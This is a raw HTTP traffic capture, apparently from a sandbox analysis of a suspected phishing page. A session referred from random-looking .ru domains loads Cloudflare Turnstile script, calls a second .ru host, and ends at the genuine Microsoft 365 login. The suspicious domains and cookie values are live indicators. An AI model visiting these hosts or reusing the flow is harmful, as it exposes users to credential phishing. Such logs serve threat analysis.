2025-03-06 21:54:56 UTC	898	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 76 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
2025-03-06 21:54:56 UTC	1369	IN	Data Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 49 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75 Data Ascii: e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
2025-03-06 21:54:56 UTC	1369	IN	Data Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 7a 74 28 65 29 7c 7c 42 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 Data Ascii: ray$/.test(a))return ot(e,t)}}function Ie(e,t){return zt(e)\|\|Bt(e,t)\|\|Xt(e,t)\|\|Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Pe(e,t){var a={label:0,sent:function(){if(l[0
2025-03-06 21:54:56 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var We=300030;var Ue=300031;var q;(fu
2025-03-06 21:54:56 UTC	1369	IN	Data Raw: 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 65 65 7c 7c 28 65 65 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 65 76 65 72 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 61 6e 75 61 6c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 6c 77 61 79 73 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 78 65 63 75 74 65 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 6e 74 65 72 61 63 74 69 6f 6e 4f 6e 6c 79 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 65 6e 64 65 72 Data Ascii: manual",e.Auto="auto"})(ee\|\|(ee={}));var ce;(function(e){e.Never="never",e.Manual="manual",e.Auto="auto"})(ce\|\|(ce={}));var Q;(function(e){e.Always="always",e.Execute="execute",e.InteractionOnly="interaction-only"})(Q\|\|(Q={}));var me;(function(e){e.Render
2025-03-06 21:54:56 UTC	1369	IN	Data Raw: 75 6e 63 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 4d 2e 4e 6f 72 6d 61 6c 2c 4d 2e 43 6f 6d 70 61 63 74 2c 4d 2e 49 6e 76 69 73 69 62 6c 65 2c 4d 2e 46 6c 65 78 69 62 6c 65 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 4e 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 Data Ascii: unction pt(e){return L([M.Normal,M.Compact,M.Invisible,M.Flexible],e)}function vt(e){return L(["auto","manual","never"],e)}function mt(e){return L(["auto","manual","never"],e)}var Nr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){return e==="auto"\|\|Nr.test
2025-03-06 21:54:56 UTC	1369	IN	Data Raw: 72 22 2c 22 72 6f 2d 72 6f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 74 29 7b 76 61 72 20 61 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 74 29 7b 76 61 72 20 6f 3b 61 3d 28 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 41 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22 Data Ascii: r","ro-ro"];function Tt(e,t){var a="https://challenges.cloudflare.com";if(t){var o;a=(o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,v,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",A=a["feedback-enabled"]===!1?"
2025-03-06 21:54:56 UTC	1369	IN	Data Raw: 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 63 2c 6f 7d 2c 74 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77 Data Ascii: ect.setPrototypeOf\|\|function(o,c){return o.__proto__=c,o},te(e,t)}function ur(e,t){if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,w
2025-03-06 21:54:56 UTC	1369	IN	Data Raw: 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 65 28 63 2c 6f 29 7d 2c 47 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 73 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 28 46 28 74 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 7a 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 42 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73 Data Ascii: ,configurable:!0}}),te(c,o)},Ge(e)}function sr(e,t){return t&&(F(t)==="object"\|\|typeof t=="function")?t:ze(e)}function dr(e){var t=Be();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this
2025-03-06 21:54:56 UTC	1369	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6f 3d 54 74 28 74 2e 70 61 72 61 6d 73 2c 21 31 29 2c 63 3d 22 68 2f 22 2e 63 6f 6e 63 61 74 28 22 67 22 2c 22 2f 22 29 2c 6c 2c 76 2c 68 3d 22 22 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 76 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 76 21 3d 3d 76 6f 69 64 20 30 3f 76 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 Data Ascii: unction(e,t,a){var o=Tt(t.params,!1),c="h/".concat("g","/"),l,v,h="".concat(o,"/cdn-cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((v=t.params.theme)!==null&&v!==void 0?v:t.theme,"/").concat(

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:54:56 UTC	596	OUT	GET /favicon.png HTTP/1.1 Host: developers.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://t8ja.vyhbxyts.ru/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-03-06 21:54:56 UTC	719	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 21:54:56 GMT Content-Type: image/png Content-Length: 937 Connection: close Server: cloudflare Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate Etag: "6be7ff94b6151f8cfbf08b53a17e2ac1" Cf-Ray: 91c5182e8b9942aa-EWR Strict-Transport-Security: max-age=15552000; preload X-Content-Type-Options: nosniff Set-Cookie: __cf_bm=2DfGCq3EFhgKfShC_TbEXtLdt1.TOFumvJpWyKYcR_o-1741298096-1.0.1.1-SdSn3cCF962FuFA8b2Ws7uozlLDa3jtvHzw5cSUnSf.OIl9f1be3ovoaphIKf_WZhZsXmY19amR3ZgHa1DRmk_NRGefTco69jNF1R..VYgw; HttpOnly; SameSite=None; Secure; Path=/; Domain=developers.cloudflare.com; Expires=Thu, 06 Mar 2025 22:24:56 GMT alt-svc: h3=":443"; ma=86400
2025-03-06 21:54:56 UTC	650	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 5b 49 44 41 54 58 c3 ed 96 4b 48 54 51 18 c7 67 e6 86 91 04 d1 26 e8 a1 d7 c9 02 21 70 59 2d d4 71 d4 96 2d 42 93 48 82 08 a3 16 51 60 48 59 99 77 4c a7 4c ed b1 0d 8a da 44 a4 e6 a3 b2 a8 a8 4d bb 68 53 8b 48 a2 77 b4 c9 8d 77 46 e7 de 79 7c fd bf 73 cf 9d 39 8e 8f 32 85 36 73 e0 c7 77 e7 dc c7 ff ff 7d df 39 f7 8e c7 93 1b b9 b1 c0 11 6d f7 7b 22 a1 22 71 cc 51 85 c7 78 f3 5a 4f a4 bd 68 e9 85 55 11 79 ec 33 0d 5d 03 5e b3 4d f7 20 fa 30 a7 01 ef 44 37 4c 1a 99 eb 97 44 dc cc 88 b3 b0 77 de eb 0d 61 24 7d 2f 75 fa 17 29 6e e8 ee b1 a6 cc 07 40 17 18 04 a3 e0 06 38 08 56 f3 79 36 a9 9a Data Ascii: PNGIHDR szzpHYs~[IDATXKHTQg&!pY-q-BHQ`HYwLLDMhSHwwFy\|s926sw}9m{""qQxZOhUy3]^M 0D7LDwa$}/u)n@8Vy6
2025-03-06 21:54:56 UTC	287	IN	Data Raw: 0e ee 39 df 2c 85 85 09 69 c6 04 d7 c0 65 d0 03 c2 20 04 ce 80 13 a0 09 1c 01 87 e4 9b b0 01 bd 5f 93 b5 e8 ca 40 13 68 01 2f 84 89 fb c2 c4 2e 16 2f 55 32 4e 64 f5 92 e4 8b e6 07 f8 2e f9 a6 f0 55 f2 05 7c 06 9f c0 7b d0 28 16 da cd ad 79 10 09 81 d7 60 0c 7c 04 e3 dc 02 7a 5c cd 06 7a d9 40 0b 6f 35 18 88 e1 2d 98 94 0b 4f f4 54 c6 54 4c 29 af 35 17 1d ce 79 b1 6d 0d 9d ab 96 0f 81 01 7a 5a e3 94 7f d8 81 b3 c7 bc c5 8b 12 f1 3a 1b b8 42 97 8a 69 0a e5 8e 77 ce 82 d2 eb 3f 21 0c f0 f6 6d 2d 78 69 f5 95 1f a6 e7 3b 9c 9e 0f 65 0c 30 c9 41 cc e1 1c 57 c7 7d bf ef 45 a6 b5 88 75 ff 0a ee e7 c8 cf 68 30 4f ad 2f c5 de df 82 55 df 00 6a 41 1d c4 ea 2c 20 a2 f3 7b 0f 28 fc ff 7f b1 f8 dd cf 5f 3d fe 77 23 bf 7e 8b c6 3c bd c1 67 0f 56 7a 91 a9 c6 c8 6f 40 1a Data Ascii: 9,ie _@h/./U2Nd.U\|{(y`\|z\z@o5-OTTL)5ymzZ:Biw?!m-xi;e0AW}Euh0O/UjA, {(_=w#~<gVzo@

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:54:58 UTC	548	OUT	GET /favicon.png HTTP/1.1 Host: developers.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: __cf_bm=2DfGCq3EFhgKfShC_TbEXtLdt1.TOFumvJpWyKYcR_o-1741298096-1.0.1.1-SdSn3cCF962FuFA8b2Ws7uozlLDa3jtvHzw5cSUnSf.OIl9f1be3ovoaphIKf_WZhZsXmY19amR3ZgHa1DRmk_NRGefTco69jNF1R..VYgw
2025-03-06 21:54:58 UTC	413	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 21:54:58 GMT Content-Type: image/png Content-Length: 937 Connection: close Cache-Control: public, max-age=0, must-revalidate ETag: "6be7ff94b6151f8cfbf08b53a17e2ac1" Strict-Transport-Security: max-age=15552000; preload X-Content-Type-Options: nosniff access-control-allow-origin: * Server: cloudflare CF-RAY: 91c5183c0a2a4285-EWR alt-svc: h3=":443"; ma=86400
2025-03-06 21:54:58 UTC	937	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 5b 49 44 41 54 58 c3 ed 96 4b 48 54 51 18 c7 67 e6 86 91 04 d1 26 e8 a1 d7 c9 02 21 70 59 2d d4 71 d4 96 2d 42 93 48 82 08 a3 16 51 60 48 59 99 77 4c a7 4c ed b1 0d 8a da 44 a4 e6 a3 b2 a8 a8 4d bb 68 53 8b 48 a2 77 b4 c9 8d 77 46 e7 de 79 7c fd bf 73 cf 9d 39 8e 8f 32 85 36 73 e0 c7 77 e7 dc c7 ff ff 7d df 39 f7 8e c7 93 1b b9 b1 c0 11 6d f7 7b 22 a1 22 71 cc 51 85 c7 78 f3 5a 4f a4 bd 68 e9 85 55 11 79 ec 33 0d 5d 03 5e b3 4d f7 20 fa 30 a7 01 ef 44 37 4c 1a 99 eb 97 44 dc cc 88 b3 b0 77 de eb 0d 61 24 7d 2f 75 fa 17 29 6e e8 ee b1 a6 cc 07 40 17 18 04 a3 e0 06 38 08 56 f3 79 36 a9 9a Data Ascii: PNGIHDR szzpHYs~[IDATXKHTQg&!pY-q-BHQ`HYwLLDMhSHwwFy\|s926sw}9m{""qQxZOhUy3]^M 0D7LDwa$}/u)n@8Vy6

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:55:11 UTC	558	OUT	GET /chiriya$3c6dm HTTP/1.1 Host: tfs7p.tjezyf.ru Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://t8ja.vyhbxyts.ru Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://t8ja.vyhbxyts.ru/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-03-06 21:55:12 UTC	834	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 21:55:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KLzEccBlxcQPw%2B%2B4pPEKIYFMGB3GFMCmD8R1K3w9%2F8CAJKDv4ot%2F%2Bpd%2BoDxPbZ5X7R%2F5leBdRVHA9FPkMnPDWAqTfIhDMC21wFNhX5Og%2BxJIrv5Q8%2B8NUN71sV7c52vEaik%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91c5188e69257cf6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10189&min_rtt=9927&rtt_var=3024&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1136&delivery_rate=291524&cwnd=251&unsent_bytes=0&cid=75e88a1fd21d2c69&ts=1459&x=0"
2025-03-06 21:55:12 UTC	6	IN	Data Raw: 31 0d 0a 31 0d 0a Data Ascii: 11
2025-03-06 21:55:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:55:14 UTC	352	OUT	GET /chiriya$3c6dm HTTP/1.1 Host: tfs7p.tjezyf.ru Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-03-06 21:55:15 UTC	818	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 21:55:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fUhmRt8SjjCuS0Za%2FLJZ0I3WPpO8CoPxncBNweJmUx5SbcF9u7S0rWOM3DqdDjihhiyH%2BjecSshCDBWX72ZZAzja3WJPlAK9g5KEi9fX2UBl0D9500nJaG8riTDcwzcmn5s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91c518a24d07ea5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9981&min_rtt=7888&rtt_var=3539&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=930&delivery_rate=307137&cwnd=252&unsent_bytes=0&cid=c6447cab9ee8b785&ts=1437&x=0"
2025-03-06 21:55:15 UTC	6	IN	Data Raw: 31 0d 0a 31 0d 0a Data Ascii: 11
2025-03-06 21:55:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:55:30 UTC	702	OUT	GET / HTTP/1.1 Host: portal.office.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://t8ja.vyhbxyts.ru/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-03-06 21:55:30 UTC	276	IN	HTTP/1.1 302 Found Location: https://www.microsoft365.com/login?ru=%2F%3Ffrom%3DPortalHome X-MSEdge-Ref: Ref A: C637B4F97DB54A578483441C6B64543E Ref B: EWR311000104021 Ref C: 2025-03-06T21:55:30Z Date: Thu, 06 Mar 2025 21:55:30 GMT Connection: close Content-Length: 0

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:55:32 UTC	737	OUT	GET /login?ru=%2F%3Ffrom%3DPortalHome HTTP/1.1 Host: www.microsoft365.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://t8ja.vyhbxyts.ru/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-03-06 21:55:32 UTC	2176	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=utf-8 Location: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638768949326945979.MGViZmE4OWItOTMyOC00ZTMxLWJjMTEtNDE4OTE3ZWNjYmYwYWJhNmI4OTUtYjM4Zi00ZTI1LTgxM2YtNzIyZDhhM2ZmNjk1&ui_locales=en-US&mkt=en-US&client-request-id=c78ca9f6-666c-4189-a6c8-50defdad580f&state=Rt8257lTmFhAL8-m-OCyBp-9HhiZIwQ_uaZ4DX79nrgtbKWNdr3UkmOm8jh5gVJko5153buwx_4McvBz3M1zriICy36Rzk1OqPwRco-6uhbAkOuEWIHF5Oh9FtB4MA3AmvfMMCPccmjUtTfMiyA-EDCUnL2nl1n2PLJxWXYOkVhf-kl6RI94t6rxZP-KKVKBhQi